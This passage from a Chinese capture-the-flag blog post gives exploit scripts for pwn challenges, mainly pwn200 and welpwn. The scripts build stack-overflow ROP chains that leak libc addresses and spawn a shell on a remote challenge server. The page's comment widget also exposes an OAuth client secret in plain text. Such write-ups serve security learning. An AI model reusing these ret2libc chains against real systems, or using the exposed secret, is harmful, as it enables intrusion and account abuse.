0,</span></span><br><span class="line">    <span class="comment"># rbp should be 1,enable not to jump</span></span><br><span class="line">    <span class="comment"># r12 should be the function we want to call</span></span><br><span class="line">    <span class="comment"># rdi=edi=r15d</span></span><br><span class="line">    <span class="comment"># rsi=r14</span></span><br><span class="line">    <span class="comment"># rdx=r13</span></span><br><span class="line">    payload = <span class="string">'a'</span> * <span class="number">0x40</span> + p64(fakeebp)</span><br><span class="line">    payload += p64(csu_end_addr) + p64(rbx) + p64(rbp) + p64(r12) + p64(</span><br><span class="line">        r13) + p64(r14) + p64(r15)  <span class="comment">#此时的r12应为被调用函数的got表地址</span></span><br><span class="line">    payload += p64(csu_front_addr)</span><br><span class="line">    payload += <span class="string">'a'</span> * <span class="number">0x38</span><span class="comment">#0x38的原因看笔记</span></span><br><span class="line">    payload += p64(last)</span><br><span class="line">    <span class="comment">#sh.send(payload)</span></span><br><span class="line">    <span class="comment">#sleep(1)</span></span><br><span class="line">    <span class="keyword">return</span> payload.ljust(<span class="number">200</span>,<span class="string">"a"</span>)</span><br><span class="line"><span class="comment">#payload1 =  csu(0,1,puts_got,0,0,start_got,main_add)</span></span><br><span class="line">payload1 = <span class="string">'a'</span> * <span class="number">0x48</span> + p64(pop_rdi) + p64(start_got) + p64(puts_plt) + p64(main_add)</span><br><span class="line"><span class="comment">#print payload1</span></span><br><span class="line">p.send(payload1.ljust(<span class="number">200</span>,<span class="string">"a"</span>))</span><br><span class="line">p.recvuntil(<span class="string">"bye~\n"</span>)</span><br><span class="line">start_add = u64(p.recv().strip(<span class="string">"\n"</span>).ljust(<span class="number">8</span>,<span class="string">"\x00"</span>))</span><br><span class="line"><span class="keyword">print</span> hex(start_add)</span><br><span class="line"></span><br><span class="line">libc = LibcSearcher(<span class="string">"__libc_start_main"</span>,start_add)</span><br><span class="line">libc_base = start_add - libc.dump(<span class="string">"__libc_start_main"</span>)</span><br><span class="line"><span class="keyword">print</span> hex(libc_base)</span><br><span class="line">bin_add = libc_base + libc.dump(<span class="string">"str_bin_sh"</span>)</span><br><span class="line">sys_add = libc_base + libc.dump(<span class="string">"system"</span>)</span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">"a"</span> * <span class="number">0x48</span> + p64(pop_rdi) + p64(bin_add) + p64(sys_add) + p64(main_add)</span><br><span class="line">p.send(payload2.ljust(<span class="number">200</span>,<span class="string">"a"</span>))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="9-pwn200"><a href="#9-pwn200" class="headerlink" title="9.pwn200"></a>9.pwn200</h2><p>很简单的rop</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"><span class="comment">#__author__='summerN@DL&amp;S'</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">file_name = <span class="string">'./1'</span></span><br><span class="line">libc_name = <span class="string">''</span></span><br><span class="line">ip = <span class="string">'111.198.29.45'</span></span><br><span class="line">port = <span class="string">'55665'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># context.arch = 'amd64'</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.terminal=[<span class="string">'tmux'</span>,<span class="string">'split'</span>,<span class="string">'-h'</span>]</span><br><span class="line"><span class="comment">#libc = ELF(libc_name)</span></span><br><span class="line">elf = ELF(file_name)</span><br><span class="line"><span class="comment">#p = process(file_name)</span></span><br><span class="line">p = remote(ip,port)</span><br><span class="line"></span><br><span class="line">write_plt = elf.plt[<span class="string">'write'</span>]</span><br><span class="line">main_got = elf.got[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">main = <span class="number">0x80484BE</span></span><br><span class="line">payload1 = <span class="string">"a"</span> * (<span class="number">0x6c</span>+<span class="number">0x4</span>) + p32(write_plt)+  p32(main)  +p32(<span class="number">1</span>) + p32(main_got) + p32(<span class="number">4</span>)</span><br><span class="line"><span class="comment">#gdb.attach(p)</span></span><br><span class="line">p.recv()</span><br><span class="line">p.send(payload1)</span><br><span class="line">main_libc = u32(p.recv().strip(<span class="string">'\n'</span>).ljust(<span class="number">4</span>,<span class="string">'\x00'</span>))</span><br><span class="line"><span class="keyword">print</span> main_libc</span><br><span class="line">libc = LibcSearcher(<span class="string">'__libc_start_main'</span>,main_libc)</span><br><span class="line">libc_base = main_libc - libc.dump(<span class="string">'__libc_start_main'</span>)</span><br><span class="line">sys_add = libc_base + libc.dump(<span class="string">'system'</span>)</span><br><span class="line">bin_add = libc_base + libc.dump(<span class="string">'str_bin_sh'</span>)</span><br><span class="line"></span><br><span class="line">payload2 =  <span class="string">"a"</span> * (<span class="number">0x6c</span>+<span class="number">0x4</span>) + p32(sys_add) + p32(<span class="number">1</span>) + p32(bin_add) </span><br><span class="line">p.send(payload2)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="10-welpwn"><a href="#10-welpwn" class="headerlink" title="10.welpwn"></a>10.welpwn</h2><p>参考：<a href="https://blog.csdn.net/seaaseesa/article/details/102944448" target="_blank" rel="noopener">https://blog.csdn.net/seaaseesa/article/details/102944448</a></p>
<p>这里主要考察堆栈结构</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python2</span></span><br><span class="line"><span class="comment">#encoding:utf-8</span></span><br><span class="line"><span class="comment">#__author__='summerN@DL&amp;S'</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line">file_name = <span class="string">'./1'</span></span><br><span class="line">libc_name = <span class="string">''</span></span><br><span class="line">ip = <span class="string">'111.198.29.45'</span></span><br><span class="line">port = <span class="string">'58639'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># context.arch = 'amd64'</span></span><br><span class="line"></span><br><span class="line">context.log_level=<span class="string">'debug'</span></span><br><span class="line">context.terminal=[<span class="string">'tmux'</span>,<span class="string">'split'</span>,<span class="string">'-h'</span>]</span><br><span class="line"><span class="comment">#libc = ELF(libc_name)</span></span><br><span class="line">elf = ELF(file_name)</span><br><span class="line">p = remote(ip,port)</span><br><span class="line">puts_plt = elf.plt[<span class="string">'puts'</span>]</span><br><span class="line">main_got = elf.got[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">write_got = elf.got[<span class="string">'write'</span>]</span><br><span class="line">start_add = <span class="number">0x4007cd</span></span><br><span class="line">pop_rdi = <span class="number">0x00000000004008a3</span></span><br><span class="line">pop_4p = <span class="number">0x000000000040089c</span></span><br><span class="line">payload = <span class="string">"a"</span> * <span class="number">0x18</span> + p64(pop_4p) + p64(pop_rdi) + p64(main_got) + p64(puts_plt) + p64(start_add)</span><br><span class="line"><span class="comment">#这里的话要搞清楚为什么需要pop_4p，因为我们需要绕过24个‘a’与pop_4p的地址，去ret我们pop_rdi，以便于继续执行</span></span><br><span class="line"><span class="comment">#p.recvuntil('Welcome to RCTF\n')</span></span><br><span class="line">p.recv()</span><br><span class="line">p.send(payload)</span><br><span class="line">p.recvuntil(<span class="string">'\x08@'</span>)</span><br><span class="line">main_add = u64(p.recvline().strip(<span class="string">'\n'</span>).ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line"><span class="comment">#这里接受7个字节是因为第八个字节为\x0a其转移字符为换行符，并且其字符是个莫名其妙的东西，做题时会卡在Libcsearch那不动，以后注意</span></span><br><span class="line"><span class="keyword">print</span> hex(main_add)</span><br><span class="line">libc = LibcSearcher(<span class="string">'__libc_start_main'</span>,main_add)</span><br><span class="line">libc_base = main_add - libc.dump(<span class="string">'__libc_start_main'</span>)</span><br><span class="line"><span class="comment">#print libc_base</span></span><br><span class="line">sys_add = libc_base + libc.dump(<span class="string">'system'</span>)</span><br><span class="line">bin_add = libc_base + libc.dump(<span class="string">'str_bin_sh'</span>)</span><br><span class="line">payload0 =   <span class="string">"a"</span> * <span class="number">0x18</span> + p64(pop_4p) + p64(pop_rdi) + p64(bin_add) + p64(sys_add) + p64(start_add)</span><br><span class="line">p.recvuntil(<span class="string">'\n'</span>)</span><br><span class="line">p.sendline(payload0)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2020/01/13/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E8%BF%9B%E9%98%B6%E5%8C%BA/" data-id="ck5cl2wl70000h8lu1lt2fnay"
         class="article-share-link">Share</a>
      
    </footer>

  </div>

  
    
  <nav class="article-nav">
    
      <a href="/2020/01/14/%E4%B8%AD%E7%BA%A7ROP/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            中级ROP
          
        </div>
      </a>
    
    
      <a href="/2020/01/12/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/" class="article-nav-link">
        <strong class="article-nav-caption">Olde posts</strong>
        <div class="article-nav-title">php伪协议</div>
      </a>
    
  </nav>


  

  
    
  <div class="gitalk" id="gitalk-container"></div>
  
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">

  
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

  
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>

  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: '665e1db541e975225bc6',
      clientSecret: '525f3534fe6005375cf8c02330ed09a2b7aab7d5',
      repo: 'talk',
      owner: 'summerN',
      admin: ['summerN'],
      // id: location.pathname,      // Ensure uniqueness and length less than 50
      id: md5(location.pathname),
      distractionFreeMode: false,  // Facebook-like distraction free mode
      pagerDirection: 'last'
    })

  gitalk.render('gitalk-container')
  </script>

  

</article>



</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2020 summerN&#39;s blog</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean" target="_blank" rel="noopener">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>

<aside class="sidebar sidebar-specter">
  
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/hexo.svg" alt="summerN&#39;s blog"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">Home</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">Archives</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/gallery">Gallery</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/about">About</a>
      </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="Search">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
        <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
          <i class="fe fe-feed"></i>
        </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>


  
<script src="/fancybox/jquery.fancybox.min.js"></script>




  
<script src="/js/tocbot.min.js"></script>

  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>



<script src="/js/ocean.js"></script>


</body>
</html>